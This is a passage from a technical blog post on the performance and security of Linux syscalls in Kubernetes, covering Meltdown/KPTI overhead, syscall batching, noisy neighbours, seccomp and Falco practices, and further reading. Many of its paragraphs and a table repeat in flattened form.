modern hardware — negligible per call, but significant at scale. Two factors in Kubernetes amplify this cost beyond the baseline. The two biggest syscall performance concerns in Kubernetes: The two biggest syscall performance concerns in Kubernetes: 1. Meltdown / KPTI Mitigations In January 2018, researchers disclosed Meltdown (CVE-2017-5754), a CPU vulnerability that allowed user-space code to read arbitrary kernel memory by exploiting speculative execution — a CPU optimization where the processor runs instructions ahead of time before determining if they should actually execute. An attacker could use this to read secrets (keys, passwords, tokens) that the kernel had in memory from other processes, all without elevated privileges. Meltdown The fix was KPTI (Kernel Page Table Isolation), shipped in Linux 4.15+ and backported to LTS kernels. The idea: keep two completely separate page tables — one for user space (which has no mappings to kernel memory), and one for kernel space (which has full mappings). Before KPTI, both user and kernel code shared a single page table with kernel memory mapped but protected. With KPTI, kernel memory is invisible to user space entirely; there’s nothing to speculatively leak. KPTI (Kernel Page Table Isolation) Note: KPTI does not address Spectre (CVE-2017-5753, CVE-2017-5715), a related but distinct speculative execution vulnerability. Spectre mitigations — Retpoline (a compiler technique to prevent speculative indirect branch prediction), IBRS (microcode that restricts cross-privilege speculative execution), and IBPB (a barrier that flushes branch predictor state between privilege contexts) — are separate and independently expensive. Note: KPTI does not address Spectre (CVE-2017-5753, CVE-2017-5715), a related but distinct speculative execution vulnerability. Spectre mitigations — Retpoline (a compiler technique to prevent speculative indirect branch prediction), IBRS (microcode that restricts cross-privilege speculative execution), and IBPB (a barrier that flushes branch predictor state between privilege contexts) — are separate and independently expensive. not Spectre How KPTI makes syscalls more expensive: How KPTI makes syscalls more expensive: On every user↔kernel transition, the CPU must switch between the two separate page table sets. This is done via the CR3 register — the control register that points to the currently active page table. A CR3 write forces the CPU to start using a different page table, which inherently invalidates the TLB (Translation Lookaside Buffer) — the CPU’s cache of recent virtual-to-physical address translations. A cold TLB means the next memory accesses require expensive page table walks instead of cache hits. CR3 register TLB (Translation Lookaside Buffer) Modern Intel/AMD CPUs support PCID (Process Context Identifiers), a hardware feature that tags TLB entries with a context ID so the CPU can maintain TLB entries for multiple address spaces simultaneously. With PCID, a CR3 switch doesn’t require flushing the entire TLB — the CPU simply activates a different set of tagged entries. This significantly reduces KPTI’s overhead, but the CR3 switch itself still has a cost. PCID (Process Context Identifiers) Real-world overhead on PCID-enabled modern CPUs: Real-world overhead on PCID-enabled modern CPUs: Workload type KPTI overhead Typical Kubernetes API server / web services 2–10% Syscall-heavy services (high-RPS Redis, dense I/O pipelines) 20–30% Pathological microbenchmarks (>1M syscalls/sec/CPU) Up to 800%* Workload type KPTI overhead Typical Kubernetes API server / web services 2–10% Syscall-heavy services (high-RPS Redis, dense I/O pipelines) 20–30% Pathological microbenchmarks (>1M syscalls/sec/CPU) Up to 800%* Workload type KPTI overhead Workload type Workload type KPTI overhead KPTI overhead Typical Kubernetes API server / web services 2–10% Typical Kubernetes API server / web services Typical Kubernetes API server / web services 2–10% 2–10% Syscall-heavy services (high-RPS Redis, dense I/O pipelines) 20–30% Syscall-heavy services (high-RPS Redis, dense I/O pipelines) Syscall-heavy services (high-RPS Redis, dense I/O pipelines) 20–30% 20–30% Pathological microbenchmarks (>1M syscalls/sec/CPU) Up to 800%* Pathological microbenchmarks (>1M syscalls/sec/CPU) Pathological microbenchmarks (>1M syscalls/sec/CPU) Up to 800%* Up to 800%* *Brendan Gregg, Netflix — a lab scenario, not a production baseline. For most Kubernetes workloads, 5–10% is a realistic planning budget. 5–10% is a realistic planning budget This is the architectural reason io_uring was designed the way it was (see The io_uring Problem): by sharing ring buffers between user space and kernel space, applications can submit and complete many I/O operations without a syscall per operation, amortizing KPTI overhead across batches. io_uring io_uring 2. Syscall Frequency vs. Batching Beyond KPTI, the raw number of syscalls a service issues matters independently. The Ring 3→Ring 0→Ring 3 round-trip is not just a page-table cost — it also involves register saves/restores, privilege checks, and kernel stack setup. These are fixed costs per syscall, regardless of how much work is done inside. A service making 100,000 small write() calls is slower than one making 10,000 write() calls with 10x larger buffers, even if total bytes are identical. This is why Go’s bufio.Writer, Java’s BufferedWriter, and virtually all I/O abstractions exist — they buffer writes in user space and flush in larger chunks, reducing syscall frequency. The actual data movement is the same; the kernel crossing overhead is not. write() write() bufio.Writer BufferedWriter The Kubernetes-specific manifestation: services with high syscall frequency per RPS are more sensitive to noisy neighbors — other workloads on the same node that drive up syscall contention. A cryptominer running mmap in a tight loop on the same physical node will degrade your API latency through two mechanisms: The Kubernetes-specific manifestation: noisy neighbors mmap Syscall contention — the kernel serializes certain operations; many concurrent syscalls from different containers compete for kernel-internal locks. Cache pollution — frequent KPTI-driven CR3 switches and the kernel code paths they invoke thrash the CPU’s L1/L2 instruction and data caches, degrading cache hit rates for your workload’s subsequent kernel entries. Syscall contention — the kernel serializes certain operations; many concurrent syscalls from different containers compete for kernel-internal locks. Syscall contention Cache pollution — frequent KPTI-driven CR3 switches and the kernel code paths they invoke thrash the CPU’s L1/L2 instruction and data caches, degrading cache hit rates for your workload’s subsequent kernel entries. Cache pollution This happens even if cgroups are correctly configured for CPU and memory — cgroups do not limit syscall rate or kernel cache footprint. Falco and eBPF-based profiling tools like Parca can surface these patterns before they become incidents. Parca attaches to perf_event hooks to capture continuous CPU flame graphs — if you see kernel time unexpectedly high in your service’s profile during a noisy-neighbor incident, syscall pressure is the first thing to investigate. perf_event What a Staff Engineer Should Own Understanding syscalls isn’t just trivia — it maps directly to ownership responsibilities at the platform level. Concrete deliverables a staff engineer should drive: Concrete deliverables a staff engineer should drive: Syscall baseline per workload class — profile what syscalls each service tier actually uses in staging. Use this to inform both seccomp profiles and anomaly detection thresholds. seccomp profile graduation pipeline — automate the path from RuntimeDefault → custom profile. Record in staging, diff against baseline, promote on green CI. Falco rule library with suppression logic — raw Falco rules generate alert fatigue. Build suppression for known-safe patterns (init containers, health checks, log rotation) and escalation logic for true positives. Kernel upgrade policy — every kernel version changes the syscall landscape (new io_uring operations, new bpf commands). Define a test matrix that validates your seccomp profiles and Falco rules against each kernel version before rollout. Threat model documentation — explicitly document your isolation assumptions. If you’re running RuntimeDefault seccomp on a multi-tenant cluster, you need to acknowledge the residual risk from the ~450 exposed syscalls and justify it against the cost of gVisor or stricter profiles. Syscall drift detection — new application versions routinely introduce new syscalls, especially as third-party dependencies update. A tightened seccomp profile that worked in v1.4.0 can silently break workloads in v1.5.0 when a new library starts calling io_uring_setup or getrandom. A production platform should automatically detect syscall drift during canary deployments — compare the observed syscall set against the approved profile baseline and surface divergences before the canary promotes to production. Tools like inspektor-gadget and Falco’s audit mode can instrument this automatically. Syscall baseline per workload class — profile what syscalls each service tier actually uses in staging. Use this to inform both seccomp profiles and anomaly detection thresholds. Syscall baseline per workload class seccomp profile graduation pipeline — automate the path from RuntimeDefault → custom profile. Record in staging, diff against baseline, promote on green CI. seccomp profile graduation pipeline RuntimeDefault Falco rule library with suppression logic — raw Falco rules generate alert fatigue. Build suppression for known-safe patterns (init containers, health checks, log rotation) and escalation logic for true positives. Falco rule library with suppression logic Kernel upgrade policy — every kernel version changes the syscall landscape (new io_uring operations, new bpf commands). Define a test matrix that validates your seccomp profiles and Falco rules against each kernel version before rollout. Kernel upgrade policy io_uring bpf Threat model documentation — explicitly document your isolation assumptions. If you’re running RuntimeDefault seccomp on a multi-tenant cluster, you need to acknowledge the residual risk from the ~450 exposed syscalls and justify it against the cost of gVisor or stricter profiles. Threat model documentation RuntimeDefault Syscall drift detection — new application versions routinely introduce new syscalls, especially as third-party dependencies update. A tightened seccomp profile that worked in v1.4.0 can silently break workloads in v1.5.0 when a new library starts calling io_uring_setup or getrandom. A production platform should automatically detect syscall drift during canary deployments — compare the observed syscall set against the approved profile baseline and surface divergences before the canary promotes to production. Tools like inspektor-gadget and Falco’s audit mode can instrument this automatically. Syscall drift detection io_uring_setup getrandom inspektor-gadget Further Reading The Linux man-pages project — man 2 syscall and individual syscall man pages are the authoritative reference “Linux Kernel Development” — Robert Love — best single-volume reference for kernel internals Brendan Gregg’s BPF Performance Tools — the canonical reference for eBPF-based observability gVisor design docs — deep dive on the Sentry and Gofer architecture Falco documentation — rule writing, driver selection, deployment patterns CVE-2019-5736, CVE-2022-0492 — read the original PoC write-ups, not just the summaries. Tracing the syscall sequence of a real exploit is the fastest way to internalize why this layer matters. Cilium’s eBPF documentation — docs.cilium.io — best practical reference for eBPF in a Kubernetes context io_uring and security — Lord et al., “An Analysis of the io_uring Attack Surface” (2022); Jann Horn’s CVE write-ups at chromium.googlesource.com; gVisor’s rationale for disabling it by default The Linux man-pages project — man 2 syscall and individual syscall man pages are the authoritative reference The Linux man-pages project man 2 syscall “Linux Kernel Development” — Robert Love — best single-volume reference for kernel internals “Linux Kernel Development” — Robert Love Brendan Gregg’s BPF Performance Tools — the canonical reference for eBPF-based observability Brendan Gregg’s BPF Performance Tools gVisor design docs — deep dive on the Sentry and Gofer architecture gVisor design docs Falco documentation — rule writing, driver selection, deployment patterns Falco documentation CVE-2019-5736, CVE-2022-0492 — read the original PoC write-ups, not just the summaries. Tracing the syscall sequence of a real exploit is the fastest way to internalize why this layer matters. CVE-2019-5736, CVE-2022-0492 Cilium’s eBPF documentation — docs.cilium.io — best practical reference for eBPF in a Kubernetes context Cilium’s eBPF documentation io_uring and security — Lord et al., “An Analysis of the io_uring Attack Surface” (2022); Jann Horn’s CVE write-ups at chromium.googlesource.com; gVisor’s rationale for disabling it by default io_uring io_uring If you’re running Kubernetes in production and the words “seccomp profile” don’t appear in your threat model, that’s the gap to close first. Everything else in this post is the foundation for understanding why. If you’re running Kubernetes in production and the words “seccomp profile” don’t appear in your threat model, that’s the gap to close first. Everything else in this post is the foundation for understanding why. NotebookLM Link